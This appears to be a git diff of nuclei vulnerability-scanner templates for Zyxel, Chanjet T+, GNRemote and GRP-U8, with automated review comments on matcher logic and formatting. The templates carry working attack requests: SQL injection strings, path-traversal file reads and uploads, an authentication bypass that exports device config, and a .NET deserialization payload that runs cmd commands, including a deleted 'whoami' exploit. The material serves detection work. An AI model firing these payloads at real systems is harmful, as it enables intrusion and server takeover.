diff --git a/http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml similarity index 100% rename from http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml rename to http/cnvd/2021/CNVD-2021-30167.yaml.yaml diff --git a/http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml similarity index 100% rename from http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml rename to http/cnvd/2023/CNVD-C-2023-76801.yaml diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml new file mode 100644 index 0000000000..c4b5ea88a8 --- /dev/null +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-0342 + +info: + name: Zyxel - Authentication Bypass + author: SleepingBag945 + severity: critical + description: | + An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. + metadata: + max-request: 1 + fofa-query: app="ZyXEL-USG-FLEX" + verified: true + tags: cve,cve2022,zyxel,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf" + + matchers-condition: and + matchers: + - type: word + words: + - "interface-name" + + - type: word + part: header + words: + - "text/zyxel" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/wechat/wechat-info-leak.yaml b/http/vulnerabilities/wechat/wechat-info-leak.yaml index eb239576c6..360756423f 100644 --- a/http/vulnerabilities/wechat/wechat-info-leak.yaml 
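Review bot: The rename target `http/cnvd/2021/CNVD-2021-30167.yaml.yaml` carries a doubled extension; the intended path is presumably `http/cnvd/2021/CNVD-2021-30167.yaml`. The file's `id` is not visible in this diff, so also check that it was updated to match the new CNVD-based basename, as the repository convention is id equals filename. The second rename in this hunk, to `http/cnvd/2023/CNVD-C-2023-76801.yaml`, is fine.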
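Review bot: The `info` block of the new CVE-2022-0342 template has no `reference` entry, although every other template touched in this commit carries one; add `reference:` with `- https://nvd.nist.gov/vuln/detail/CVE-2022-0342` under `description`. A CVE template would normally also carry a `classification` block (`cve-id`, `cwe-id`, `cvss-metrics`, `cvss-score`), which is missing here. The `critical` severity is justified since the request retrieves the device's startup configuration, and `matchers-condition: and` combined with the `text/zyxel` content-type check is a reasonable guard against generic 200 pages. The file also ends without a trailing newline (`\ No newline at end of file`).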
+++ b/http/vulnerabilities/wechat/wechat-info-leak.yaml @@ -1,20 +1,24 @@ id: wechat-info-leak info: - name: wechat-info-leak + name: WeChat agentinfo - Information Exposure author: SleepingBag945 severity: high description: | - 企业微信信息泄露 + There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md metadata: - tags: wechat + max-request: 1 + fofa-query: body="wework_admin.normal_layout" + verified: true + tags: wechat,exposure,tencent http: - raw: - | GET /cgi-bin/gateway/agentinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Content-Type: application/x-www-form-urlencoded matchers: @@ -22,4 +26,4 @@ http: dsl: - status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid") - contains(body_1,"corpid") - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml similarity index 50% rename from http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml rename to http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml index 1d190ef477..3b30482133 100755 --- a/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml 
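Review bot: The new last line `condition: and` is written without a trailing newline (`\ No newline at end of file`), which yamllint's `new-line-at-end-of-file` rule flags and which makes the next edit to the file show up as a spurious change to this line; end the file with a single newline. The same missing newline is introduced in chanjet-gnremote-sqli, chanjet-tplus-checkmutex-sqli, chanjet-tplus-file-read, chanjet-tplus-fileupload, chanjet-tplus-rce, chanjet-tplus-ufida-sqli, grp-u8-uploadfiledata-fileupload, yonyou-nc-accept-fileupload, yonyou-nc-baseapp-deserialization, yonyou-nc-dispatcher-fileupload and yonyou-nc-filereceiveservlet-fileupload. The dsl entry `contains(body_1,"corpid")` kept as context is implied by the `strcorpid` check above it, so it could be dropped in a follow-up.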
@@ -1,18 +1,24 @@ -id: yonyou-chanjet-remote-gnfunction-sqli +id: chanjet-gnremote-sqli info: - name: 畅捷通远程通 GNRemote.dll SQL注入漏洞 + name: Changjietong Remote Communication GNRemote.dll - SQL Injection author: SleepingBag945 severity: high - description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 - tags: yonyou,changjietong + description: | + Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database. + reference: | + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 2 + fofa-query: body="远程通CHANJET_Remote" + verified: true + tags: yonyou,chanjet,sqli http: - raw: - | POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip 
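Review bot: `reference: |` turns the reference into a block scalar, so the value becomes the literal string `- https://github.com/PeiQi0/...` (leading dash and space included) rather than a one-element list; every other template in this commit writes `reference:` followed by a list item. Drop the `|` so that the line reads `reference:` with the URL as an indented `- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/...` entry beneath it. The `- raw:` request block that begins in this hunk continues past its end.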
@@ -21,32 +27,25 @@ http: - | POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1 - - matchers-condition: and matchers: - type: word + part: body_1 words: - "{\"RetCode\":0}" - part: body_1 condition: and - type: word + part: body_2 words: - "{\"RetCode\":2}" - part: body_2 condition: and - type: status status: - - 200 - - - -# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml index c5dcb41470..f3844303d8 100755 --- a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml @@ -1,13 +1,17 @@ id: chanjet-tplus-checkmutex-sqli info: - name: chanjettplus - CheckMutex SQL Injection + name: Chanjet Tplus CheckMutex - SQL Injection author: unknown - severity: critical + severity: high description: | There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou. reference: - - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880 + - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="畅捷通-TPlus" + verified: true tags: chanjettplus,sqli http: 
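Review bot: The collapsed hunk shows `- - matchers-condition: and` directly before `matchers:`, which reads as the `matchers-condition: and` line being removed together with a blank line; if so, the new side has three matchers with no `matchers-condition`, and since nuclei defaults that setting to `or`, the bare `- type: status` / `- 200` matcher alone would mark any HTTP 200 as a high-severity SQL injection. If the line was in fact kept as context, disregard this; otherwise restore `matchers-condition: and` above `matchers:`. The same ambiguity appears in hunk 1 of chanjet-tplus-ufida-sqli (`- matchers-condition: and matchers:`), which likewise has a separate `- type: status` matcher in its second hunk. The `condition: and` on each single-word matcher is redundant but harmless.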
@@ -19,8 +23,13 @@ http: Cookie: ASP.NET_SessionId=; sid=admin {"accNum": "6'", "functionTag": "SYS0104", "url": ""} + matchers: - type: word + part: body words: - - "附近有语法错误" - part: body \ No newline at end of file + - "order by begintime" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml new file mode 100755 index 0000000000..71089b0995 --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml @@ -0,0 +1,33 @@ +id: chanjet-tplus-file-read + +info: + name: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="畅捷通-TPlus" + verified: true + tags: yonyou,chanjet,lfi,tplus + +http: + - method: GET + path: + - "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "xml version" + - "" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml new file mode 100755 index 0000000000..899a90ef99 --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml 
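Review bot: The added `- type: status` / `- 200` matcher sits in a `matchers:` list with no `matchers-condition`, and neither this hunk nor the file's first hunk (which ends at `http:`) sets one; nuclei's default is `or`, so any 200 response to the login POST now satisfies the template and reports a high-severity SQL injection regardless of whether `order by begintime` is in the body. Add `matchers-condition: and` at the same indentation as `matchers:`, or drop the status matcher and keep only the word match. The `- raw:` request that precedes `matchers:` starts outside this hunk.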
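Review bot: The second entry of the word matcher in chanjet-tplus-file-read, `- ""`, is an empty string as shown here; `contains` with an empty needle is always true, so under `condition: and` it adds nothing and the check reduces to `xml version` plus status 200, which any XML page would satisfy. If a tag-like token (such as the root element name of an ASP.NET Web.Config) was meant and was lost in rendering, confirm it is present in the committed file; otherwise replace the entry with a string only the retrieved file contains, or remove it. The `reference` points at `blob/main/...` while the other PeiQi link in this commit pins a commit hash; pin this one too so the citation keeps resolving.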
@@ -0,0 +1,43 @@ +id: chanjet-tplus-fileupload + +info: + name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: | + There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 2 + fofa-query: app="畅捷通-TPlus" + verified: true + tags: yonyou,chanjet,upload,intrusive + +http: + - raw: + - | + POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo + Accept-Encoding: gzip + + ------WebKitFormBoundaryuirnbcvo + Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg" + Content-Type: image/jpeg + + {{randstr_2}} + ------WebKitFormBoundaryuirnbcvo-- + + - | + GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1==200 && status_code_2==200" + - "contains(body_2, '{{randstr_2}}')" + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml deleted file mode 100644 index 84fa88c270..0000000000 --- a/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml +++ /dev/null 
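Review bot: The `name` reads `UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload`; `TPluse` is a typo for `TPlus`, which the description and the `tplus` tag in chanjet-tplus-file-read use. The same typo is in the `name` of chanjet-tplus-ufida-sqli (`Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection`). The `reference` URL uses `blob/main/` rather than a pinned commit, unlike the PeiQi link in chanjet-gnremote-sqli, so it may rot. The `intrusive` tag is appropriate, since a successful run leaves `{{randstr_1}}.jpg` under `img/login/` on the target; a sentence noting that artefact in `description` would help operators decide whether to run it.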
@@ -1,67 +0,0 @@ -id: chanjet-tplus-getstorewarehousebystore_rce - -info: - name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞 - author: SleepingBag945 - severity: critical - description: | - 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞 - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - metadata: - tags: yonyou,chanjet - -http: - - raw: - - | - POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 - Host: {{Hostname}} - X-Ajaxpro-Method: GetStoreWarehouseByStore - - { - "storeID":{} - } - - matchers-condition: or - matchers: - - type: word - part: body - words: - - "actorId或archivesId不能为空" - - "\"Type\":\"System.ArgumentException\"" - condition: and - - - type: word - part: body - words: - - "Object reference not set to an instance of an object" - - "System.NullReferenceException" - condition: and - - - - - - -# EXP -# POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 -# Host: -# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F -# Connection: close -# Content-Length: 668 -# X-Ajaxpro-Method: GetStoreWarehouseByStore -# Accept-Encoding: gzip - -# { -# "storeID":{ -# "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", -# "MethodName":"Start", -# "ObjectInstance":{ -# "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", -# "StartInfo":{ -# "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", -# "FileName":"cmd", -# "Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt" -# } 
-# } -# } -# } diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml new file mode 100644 index 0000000000..fef9baf76a --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml 
@@ -0,0 +1,53 @@ +id: chanjet-tplus-rce + +info: + name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution + author: SleepingBag945 + severity: critical + description: | + Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution. + reference: + - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: app="畅捷通-TPlus" + verified: true + tags: chanjettplus,rce + +http: + - raw: + - | + POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 + Host: {{Hostname}} + X-Ajaxpro-Method: GetStoreWarehouseByStore + + { + "storeID":{ + "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", + "MethodName":"Start", + "ObjectInstance":{ + "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "StartInfo":{ + "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "FileName":"cmd", + "Arguments":"/c ping {{interactsh-url}}" + } + } + } + } + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "actorId或archivesId不能为空" + - "\"Type\":\"System.ArgumentException\"" + - "Object reference not set to an instance of an object" + - "System.NullReferenceException" + condition: or + + - 
type: word + part: interactsh_protocol + words: + - "dns" \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml similarity index 62% rename from http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml rename to http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml index 809e9ad420..21525c8bf3 100755 --- a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml 
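Review bot: With `matchers-condition: or`, the first word matcher alone (`condition: or` over the `System.ArgumentException` / `NullReferenceException` strings) is enough to report a critical RCE, yet such .NET error text only suggests the AjaxPro method exists and processed the request, not that the command ran; only the `interactsh_protocol` / `dns` match is evidence of execution. Consider requiring the interaction for the critical finding and either dropping the error-string matcher or documenting in `description` that an error-string-only match is weak evidence. `metadata` also lacks `max-request: 1`, which the other templates in this commit set; yonyou-nc-dispatcher-fileupload is missing it as well (it sends two requests). The `chanjettplus` tag differs from the `chanjet` tag used by the sibling TPlus templates added here.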
@@ -1,24 +1,29 @@ -id: yonyou-changjietong-tplus-ufida-sqli +id: chanjet-tplus-ufida-sqli info: - name: 畅捷通 T+ Ufida.T.SM.Login.UIP SQL注入漏洞 + name: Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection author: SleepingBag945 severity: high - description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 - tags: yonyou,changjietong + description: | + Chanjet TPluse application has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database. + reference: + - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md + metadata: + max-request: 1 + fofa-query: app="畅捷通-TPlus" + verified: true + tags: yonyou,chanjet,sqli http: - raw: - | POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""} - matchers-condition: and matchers: - type: word @@ -31,5 +36,4 @@ http: - type: status status: - - 200 - + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml similarity index 55% rename from http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml rename to http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml index 756203235b..c04b608af5 100755 
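Review bot: The `reference` link uses `blob/master/...`, a mutable ref, while the other MrWQ references added in this commit (chanjet-tplus-checkmutex-sqli, chanjet-tplus-rce) pin the commit `7551f7584bd35039028b1d9473a00201ed18e6b2`; pin this one the same way so the citation stays stable. The rewritten `description` no longer names the affected endpoint, so consider mentioning `Ufida.T.SM.Login.UIP` / `CheckPassword` in it as the `name` does.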
--- a/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml @@ -1,20 +1,24 @@ -id: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload +id: grp-u8-uploadfiledata info: - name: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload + name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 用友U8+ERP客户关系管理软件存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。 + description: | + File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server. reference: - - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html - tags: yonyou,upload + - https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag + metadata: + max-request: 2 + fofa-query: title="用友GRP-U8行政事业内控管理软件" + verified: true + tags: yonyou,fileupload,grp,intrusive http: - raw: - | POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1 - Host: 60.172.58.9:8010 - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Host: {{Hostname}} Content-Length: 327 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw @@ -34,18 +38,12 @@ http: - | GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Accept-Encoding: gzip - req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" - condition: and - - -# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file + condition: and \ No newline at end of file 
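Review bot: The new `id: grp-u8-uploadfiledata` does not match the renamed file `grp-u8-uploadfiledata-fileupload.yaml`; nuclei-templates expects the id and the basename to agree, so either rename the file or set `id: grp-u8-uploadfiledata-fileupload`. The `name` and `fofa-query` identify the product as GRP-U8 (`用友GRP-U8行政事业内控管理软件`), but the rewritten `description` says `UFIDA U8+ERP customer relationship management software`, which is a different product line; align the description with the name. The request body of the first raw request lies between the two hunks and is not visible here.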
diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml deleted file mode 100755 index ba54daed45..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: yonyou-changjietong-tplus-file-upload - -info: - name: 畅捷通 T+ 任意文件上传漏洞 - author: SleepingBag945 - severity: critical - description: 畅捷通 T+ 系列产品存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。 - tags: yonyou,changjietong,upload - -http: - - raw: - - | - POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo - Accept-Encoding: gzip - - ------WebKitFormBoundaryuirnbcvo - Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg" - Content-Type: image/jpeg - - {{randstr_2}} - ------WebKitFormBoundaryuirnbcvo-- - - - | - GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Encoding: gzip - - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1==200" - - "status_code_2==200" - - "contains(body_2, '{{randstr_2}}')" - condition: and - diff --git a/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml deleted file mode 100755 index 6d63bf8eae..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: yonyou-changjietong-tplus-downloadproxy-file-read - -info: - name: 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 - author: SleepingBag945 - severity: medium - description: 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件 - tags: yonyou,changjietong - -http: - - raw: - - | - GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "xml version" - - "" - part: body - condition: and - - - type: status - status: - - 200 - diff --git a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml index c6cd934f97..6c165c4cea 100755 --- a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml +++ b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml 
